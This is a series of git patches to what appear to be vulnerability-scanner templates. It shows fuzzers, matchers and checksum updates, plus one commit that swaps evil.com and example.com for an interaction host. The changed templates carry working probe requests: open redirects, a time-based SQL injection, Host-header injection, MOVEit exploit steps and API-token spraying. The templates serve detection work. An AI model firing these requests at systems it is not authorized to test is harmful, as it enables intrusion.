wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From f04b1520d2b583537ae106537772f0265981db23 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Jul 2024 08:21:17 +0000 Subject: [PATCH 1557/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9000af01d5..6cb071e53f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/cves/2024/CVE-2024-40348.yaml' - 'http/cves/2024/CVE-2024-4257.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' + - 'http/cves/2024/CVE-2024-4885.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/cves/2024/CVE-2024-6289.yaml' - 'http/cves/2024/CVE-2024-6646.yaml' From 9dd4ae439bb067785dd30e0fe3185d79206fb695 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 23 Jul 2024 11:52:18 +0330 Subject: [PATCH 1558/1841] Improve dom-xss.yaml --- dast/vulnerabilities/xss/dom-xss.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml index 09394df88e..04a71e39d7 100644 --- a/dast/vulnerabilities/xss/dom-xss.yaml +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -31,6 +31,12 @@ headless: fuzz: - "{{reflection}}" + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + stop-at-first-match: true matchers-condition: and matchers: @@ -43,4 +49,4 @@ headless: part: header words: - "text/html" -# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207fab7c940fcf22142b9d67138f5ab9f0b23ff7990e1a3140a0e427d5040f331b02200c46ebbb04f1cc22da5644e29a7cf09905491c071ee8a80b2cd1070c6772827b:922c64590222798bb761d5b6d8e72950 From f09267d3629e12bab985ae8ec23d9c58df467a13 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 23 Jul 2024 13:55:45 +0530 Subject: [PATCH 1559/1841] FP -Fix jan-file-upload.yaml --- http/vulnerabilities/other/jan-file-upload.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/jan-file-upload.yaml b/http/vulnerabilities/other/jan-file-upload.yaml index 0421e51460..bfee15e95b 100644 --- a/http/vulnerabilities/other/jan-file-upload.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -42,9 +42,9 @@ http: - type: word part: body_2 words: - - '{{string}}' + - '{{randstr}}' - type: status status: - 200 -# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950 From 8edfa69ad1a20d17674ae4b6fd9905e2727fbc5f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Jul 2024 13:57:37 +0530 Subject: [PATCH 1560/1841] added content type --- http/vulnerabilities/other/jan-file-upload.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/jan-file-upload.yaml b/http/vulnerabilities/other/jan-file-upload.yaml index bfee15e95b..93722eb26f 100644 --- a/http/vulnerabilities/other/jan-file-upload.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -44,7 +44,9 @@ http: words: - '{{randstr}}' - - type: status - status: - - 200 + - type: word + part: content_type_2 + words: + - 'text/plain' + # digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950 From d818ff41a3b0b0fb9f7534caf5d0c7c5571d39f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:30:56 +0000 Subject: [PATCH 1561/1841] Auto Generated Templates Checksum [Tue Jul 23 08:30:56 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a61a28f0aa..3217197451 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3056,7 +3056,7 @@ http/cves/2023/CVE-2023-22527.yaml:f03d7787b1186c69d35db7079c8925f8aa5e07d2 http/cves/2023/CVE-2023-22620.yaml:2aa0bafaecd3b3b8a9583a5cbfdd7e9c1a1cb257 http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 http/cves/2023/CVE-2023-22897.yaml:b79dbca06ddb56668881397e8ded0c7189a8ca79 -http/cves/2023/CVE-2023-2309.yaml:ea784095e18733873ab1fdfaf14e30f7436da234 +http/cves/2023/CVE-2023-2309.yaml:10c1b4957845c40fa4c09e4576c21ce8ac11d8da http/cves/2023/CVE-2023-23161.yaml:bba84f830ad38a31c2d338fabc553dbc0e1be8b7 http/cves/2023/CVE-2023-23333.yaml:bb8afd05703411ed6fe92a571938a6dc46183f2a http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 @@ -8118,7 +8118,7 @@ http/vulnerabilities/other/icewarp-webclient-rce.yaml:bf387ae5e45135b872e69d2cf1 http/vulnerabilities/other/indonasia-toko-cms-sql.yaml:a4ae4322271341d2153f07c51747876b704f1bf4 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:3dcfa246854ab35fea28a9af31fd52c102672dd0 http/vulnerabilities/other/interlib-fileread.yaml:3445c93055a5b98d53d8c6d9e10a408f51e8753f -http/vulnerabilities/other/jan-file-upload.yaml:fb1229176f007981856f73faf9a36fea755c3de5 +http/vulnerabilities/other/jan-file-upload.yaml:ffdcfe9edf34701df82f9e3744ea26f17ad13e2e http/vulnerabilities/other/java-melody-xss.yaml:05dfd2b795e58f096c6f9312736d863ca73a6e6e http/vulnerabilities/other/jeewms-lfi.yaml:b5a932db2e83beca026f5331c031c4aaa9eea8aa http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:347b7aaa0256e9abdf47a0ba8705a3e023a6f56b @@ -8917,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4d4b09a6102b05852f7c50462f8fa6ce8f16b63f +templates-checksum.txt:0ea7e451c2a65cc95284950e2353c7f8b0853b3b vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 5232ad3d560f03c44587f5bf9e2a19af8e0d2d92 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 08:32:38 +0000 Subject: [PATCH 1562/1841] Auto Template Signing [Tue Jul 23 08:32:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4885.yaml | 1 + http/vulnerabilities/other/jan-file-upload.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4885.yaml b/http/cves/2024/CVE-2024-4885.yaml index 03a6173109..b2174eb649 100644 --- a/http/cves/2024/CVE-2024-4885.yaml +++ b/http/cves/2024/CVE-2024-4885.yaml @@ -47,3 +47,4 @@ http: part: interactsh_request words: - "sPassword" +# digest: 4a0a00473045022025e6631dabad4579c99709729fae229ea1e0c525a01676fac07451061cb1d8b4022100c5b5f8a3ff93eb00c43a7639075d79f0ada4374abed4f2ad227cf2a326b33661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/jan-file-upload.yaml b/http/vulnerabilities/other/jan-file-upload.yaml index 93722eb26f..ecd9ea3008 100644 --- a/http/vulnerabilities/other/jan-file-upload.yaml +++ b/http/vulnerabilities/other/jan-file-upload.yaml @@ -48,5 +48,4 @@ http: part: content_type_2 words: - 'text/plain' - -# digest: 4a0a004730450220588386f232e7fd1b2d944debc86e55c0ab9a3b987ab46344021ca95eb4a20148022100cc9ba34700beeebf9427f7d63787d562143f34baf764c1d22f93442c9b932c1c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bab87139fb70667309d17f748b218ed04bd46430722ce1a85672fb48685efc1c0220027468b820d19a0c87d363387aecaaaf6a7448a21ca3584e58509cfbbe10f533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 22f763e16f417b271a850ed20f6eab712354d3cb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Jul 2024 15:46:24 +0400 Subject: [PATCH 1563/1841] Update exposed-svn.yaml --- http/exposures/configs/exposed-svn.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/exposed-svn.yaml b/http/exposures/configs/exposed-svn.yaml index 9ce74df317..829208ee29 100644 --- a/http/exposures/configs/exposed-svn.yaml +++ b/http/exposures/configs/exposed-svn.yaml @@ -23,7 +23,7 @@ http: - type: regex part: body regex: - - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" + - "(^\\d\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" - type: status status: From 4bec62e8b50d9dd50f3ce9adf6a7562115e453d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Jul 2024 15:53:07 +0400 Subject: [PATCH 1564/1841] Update CVE-2019-10092.yaml --- http/cves/2019/CVE-2019-10092.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index ec8151ba45..0e1d666b0c 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -38,12 +38,13 @@ http: - '{{BaseURL}}/%5cgoogle.com/evil.html' matchers-condition: and - matchers: - type: word words: - "Proxy Error" + - type: word words: - "" + # digest: 4a0a00473045022100bfe2eb7f8a4f95d91a420f7ad97b449eb4a6d0f5943939f24271168a88e3a48102202e82f70bff457ab6443cf8b75fcd733564ec1223feacb6d86ba85e98c95a4fc2:922c64590222798bb761d5b6d8e72950 From c6214b4f104477406f11e1d3ac3d7f625b6beba8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 11:59:20 +0000 Subject: [PATCH 1566/1841] Auto Generated Templates Checksum [Tue Jul 23 11:59:20 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3217197451..4c09dd0cf8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1662,7 +1662,7 @@ http/cves/2019/CVE-2019-0193.yaml:85ff71a8d757cd8e6085526c56db1ee8902d870e http/cves/2019/CVE-2019-0221.yaml:98dd2dd8bf4acddefec1614032c5a4e68a4c58c0 http/cves/2019/CVE-2019-0230.yaml:abac62a93b0325111c3fb7ee826601157f8978bb http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 -http/cves/2019/CVE-2019-10092.yaml:f83e1958d6881852f980757cb77e70178ae2d56c +http/cves/2019/CVE-2019-10092.yaml:17d01ea8dd7105d57a124057bc25464ddf2cc2ef http/cves/2019/CVE-2019-10098.yaml:cca98e973fbd172d913abfb3f98c972183a9e6c6 http/cves/2019/CVE-2019-1010287.yaml:d2e19f76cc15ce6ed0eb9445a2b813b79e031652 http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 @@ -3509,7 +3509,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f -http/cves/2024/CVE-2024-4885.yaml:2525c7405cd7c15756f7c1534b5c6947e82cf274 +http/cves/2024/CVE-2024-4885.yaml:07c029860a99bdbcbad5392449bc97517616d93c http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 @@ -8118,7 +8118,7 @@ http/vulnerabilities/other/icewarp-webclient-rce.yaml:bf387ae5e45135b872e69d2cf1 http/vulnerabilities/other/indonasia-toko-cms-sql.yaml:a4ae4322271341d2153f07c51747876b704f1bf4 http/vulnerabilities/other/inspur-clusterengine-rce.yaml:3dcfa246854ab35fea28a9af31fd52c102672dd0 http/vulnerabilities/other/interlib-fileread.yaml:3445c93055a5b98d53d8c6d9e10a408f51e8753f -http/vulnerabilities/other/jan-file-upload.yaml:ffdcfe9edf34701df82f9e3744ea26f17ad13e2e +http/vulnerabilities/other/jan-file-upload.yaml:c52fa464104ca9dd56a54d4551011408dfad8a61 http/vulnerabilities/other/java-melody-xss.yaml:05dfd2b795e58f096c6f9312736d863ca73a6e6e http/vulnerabilities/other/jeewms-lfi.yaml:b5a932db2e83beca026f5331c031c4aaa9eea8aa http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:347b7aaa0256e9abdf47a0ba8705a3e023a6f56b @@ -8917,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0ea7e451c2a65cc95284950e2353c7f8b0853b3b +templates-checksum.txt:5ba9f65dd1caaabc359157736fe4f2067dc4758a vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 025d227309208cb0507125e759ddcdbb4371967f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 12:00:59 +0000 Subject: [PATCH 1567/1841] Auto Template Signing [Tue Jul 23 12:00:59 UTC 2024] :robot: --- http/cves/2019/CVE-2019-10092.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 0e1d666b0c..d6179e89be 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -46,5 +46,4 @@ http: - type: word words: - "" - -# digest: 4a0a00473045022100bfe2eb7f8a4f95d91a420f7ad97b449eb4a6d0f5943939f24271168a88e3a48102202e82f70bff457ab6443cf8b75fcd733564ec1223feacb6d86ba85e98c95a4fc2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022072c4826cd93a9111207ae811668847ecafb672d460ab75da913839db52759d3a02210096186268e2258437dea75106458c0cde8dc7812605c5a6bf5729e59d3915a269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ea74b5214c28eeb2895388fa81668dbe7f3be77d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 12:13:24 +0000 Subject: [PATCH 1569/1841] Auto Generated Templates Checksum [Tue Jul 23 12:13:24 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4c09dd0cf8..31b42df2e4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1662,7 +1662,7 @@ http/cves/2019/CVE-2019-0193.yaml:85ff71a8d757cd8e6085526c56db1ee8902d870e http/cves/2019/CVE-2019-0221.yaml:98dd2dd8bf4acddefec1614032c5a4e68a4c58c0 http/cves/2019/CVE-2019-0230.yaml:abac62a93b0325111c3fb7ee826601157f8978bb http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 -http/cves/2019/CVE-2019-10092.yaml:17d01ea8dd7105d57a124057bc25464ddf2cc2ef +http/cves/2019/CVE-2019-10092.yaml:ed295e2aae81b0d5c2ddb39612fb8afe2f9adb8e http/cves/2019/CVE-2019-10098.yaml:cca98e973fbd172d913abfb3f98c972183a9e6c6 http/cves/2019/CVE-2019-1010287.yaml:d2e19f76cc15ce6ed0eb9445a2b813b79e031652 http/cves/2019/CVE-2019-1010290.yaml:a264cb928c69ab6428e128c0ee33d265634e2fc2 @@ -4914,7 +4914,7 @@ http/exposures/configs/exposed-darcs.yaml:ded4549a0c601780ca5425f48ddabb47ca802b http/exposures/configs/exposed-gitignore.yaml:1227f8bcb56bbcdc32baf156eb6d21ac06383c6b http/exposures/configs/exposed-hg.yaml:a88625c10530e2d9a7717cd4a2d4b0f7f35ab167 http/exposures/configs/exposed-sharepoint-list.yaml:912d3a0311062208cd6cc6d92a9b6456c2f653d2 -http/exposures/configs/exposed-svn.yaml:9fb8eb671ef20a0114ce31a5db568992528d85ae +http/exposures/configs/exposed-svn.yaml:e4e592043b58dc56b690c62724dadd546cdd9831 http/exposures/configs/exposed-vscode.yaml:dbcb3ed67d0dff4e71076924fb318d2a5a7614f9 http/exposures/configs/filestash-admin-config.yaml:3f7ba25430b6b46c4f18c279aafd08b5025208fa http/exposures/configs/firebase-config-exposure.yaml:3fb8f306a1cc3f5741eb0ba1275d557471ce16ae @@ -8917,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5ba9f65dd1caaabc359157736fe4f2067dc4758a +templates-checksum.txt:3c9efed0e605703d97a132acee7f919ce4fac105 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 987152cb79f305a188014f0ce7fddb89ff5e22af Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 12:15:01 +0000 Subject: [PATCH 1570/1841] Auto Template Signing [Tue Jul 23 12:15:01 UTC 2024] :robot: --- http/exposures/configs/exposed-svn.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/exposed-svn.yaml b/http/exposures/configs/exposed-svn.yaml index 829208ee29..10e5998ce7 100644 --- a/http/exposures/configs/exposed-svn.yaml +++ b/http/exposures/configs/exposed-svn.yaml @@ -33,5 +33,4 @@ http: part: header words: - "text/plain" - -# digest: 490a00463044022005396383a0f6f9d24fe35d0f3efbae1bd4f4462c98c3afa66e54576a7d185a38022051a53f8ba6064ade4a69b39f3717bd47017f1d5d9220dfa53ce3c016435c8a09:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210085def8b89dd34b928302560c1e4b5980c9231c233b541e454590377c610d1ebe022100a180164c7ed1a32499d5c357edcec100f5246d4ed474109790b414cb93059018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 09962be03ed56303b1dd2d0c5e25e7fa34c5d36d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 23 Jul 2024 16:51:51 +0400 Subject: [PATCH 1571/1841] updated example and evil.com domains --- http/cves/2018/CVE-2018-17422.yaml | 8 ++++---- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 4 ++-- http/cves/2023/CVE-2023-24044.yaml | 4 ++-- http/cves/2023/CVE-2023-34362.yaml | 4 ++-- http/exposures/backups/zip-backup-files.yaml | 2 +- http/token-spray/api-scraperbox.yaml | 4 ++-- http/token-spray/api-scrapestack.yaml | 4 ++-- http/token-spray/api-zenrows.yaml | 4 ++-- http/vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- 13 files changed, 22 insertions(+), 22 deletions(-) diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index b18db5b54b..11965dd707 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -37,14 +37,14 @@ info: http: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me' stop-at-first-match: true matchers: - type: word part: body words: - - "self.location = 'http://evil.com'" - - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" + - "self.location = 'http://oast.me'" + - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'" # digest: 4a0a00473045022100ef42faf462b056809e87c56a2bd991601c0d4b37f9b1b0aa4e16c58a0cc1762802204ecf6513868b5bb6ce9f8b4a830ded2d3c2a660d9e27255179622995bacbc87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 2084b341c2..72a743d2bd 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -30,7 +30,7 @@ info: http: - raw: - | - POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1 + POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 65d995b0c0..f317288c1a 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -40,7 +40,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 + action=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523 matchers: - type: dsl diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 79dd35b2e1..f4276830ae 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -51,7 +51,7 @@ http: -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="formData" - email=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva + email=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data= -----------------------------30259827232283860776499538268 Content-Disposition: form-data; name="action" diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 8c528e6b4b..3f5acccdfa 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -43,7 +43,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"id":"{{randstr}}","name":"TEST NODE","method":"GET","http":"http://example.com","interval":"10s","timeout":"1s","disable_redirects":true} + {"id":"{{randstr}}","name":"TEST NODE","method":"GET","http":"http://oast.me","interval":"10s","timeout":"1s","disable_redirects":true} - | # deregister test node PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2022/CVE-2022-38131.yaml b/http/cves/2022/CVE-2022-38131.yaml index 7fc1afd85a..c195e55da3 100644 --- a/http/cves/2022/CVE-2022-38131.yaml +++ b/http/cves/2022/CVE-2022-38131.yaml @@ -39,7 +39,7 @@ info: http: - raw: - | - GET //%5cexample.com HTTP/1.1 + GET //%5coast.me HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -47,7 +47,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' - type: status status: diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index b06bf94b42..7f24971864 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -46,14 +46,14 @@ http: - "{{BaseURL}}/login.php" headers: - Host: "evil.com" + Host: "oast.me" matchers-condition: and matchers: - type: word part: location words: - - 'https://evil.com/login_up.php' + - 'https://oast.me/login_up.php' - type: status status: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index ac5b3e2c32..3dcb6a1b1f 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -49,7 +49,7 @@ http: X-siLock-Transaction: session_setvars X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 - X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com + X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me Cookie: siLockLongTermInstID=0 - | POST /guestaccess.aspx HTTP/1.1 @@ -83,7 +83,7 @@ http: Cookie: siLockLongTermInstID=0 Content-Type: application/x-www-form-urlencoded - CsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list + CsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list - | POST /api/v1/auth/token HTTP/1.1 Host: {{Hostname}} diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 6b334785e5..53bcdde076 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -22,7 +22,7 @@ http: payloads: FILENAME: - "{{FQDN}}" # www.example.com - - "{{RDN}}" # example.com + - "{{RDN}}" # - "{{DN}}" # example - "{{SD}}" # www - "{{date_time('%Y')}}" # 2023 diff --git a/http/token-spray/api-scraperbox.yaml b/http/token-spray/api-scraperbox.yaml index b43ab27672..013f8137fb 100644 --- a/http/token-spray/api-scraperbox.yaml +++ b/http/token-spray/api-scraperbox.yaml @@ -17,7 +17,7 @@ self-contained: true http: - method: GET path: - - "https://api.scraperbox.com/scrape?token={{token}}&url=https://example.com" + - "https://api.scraperbox.com/scrape?token={{token}}&url=https://oast.me" matchers-condition: and matchers: @@ -28,6 +28,6 @@ http: - type: word part: body words: - - 'Example Domain' + - '

    Interactsh Server

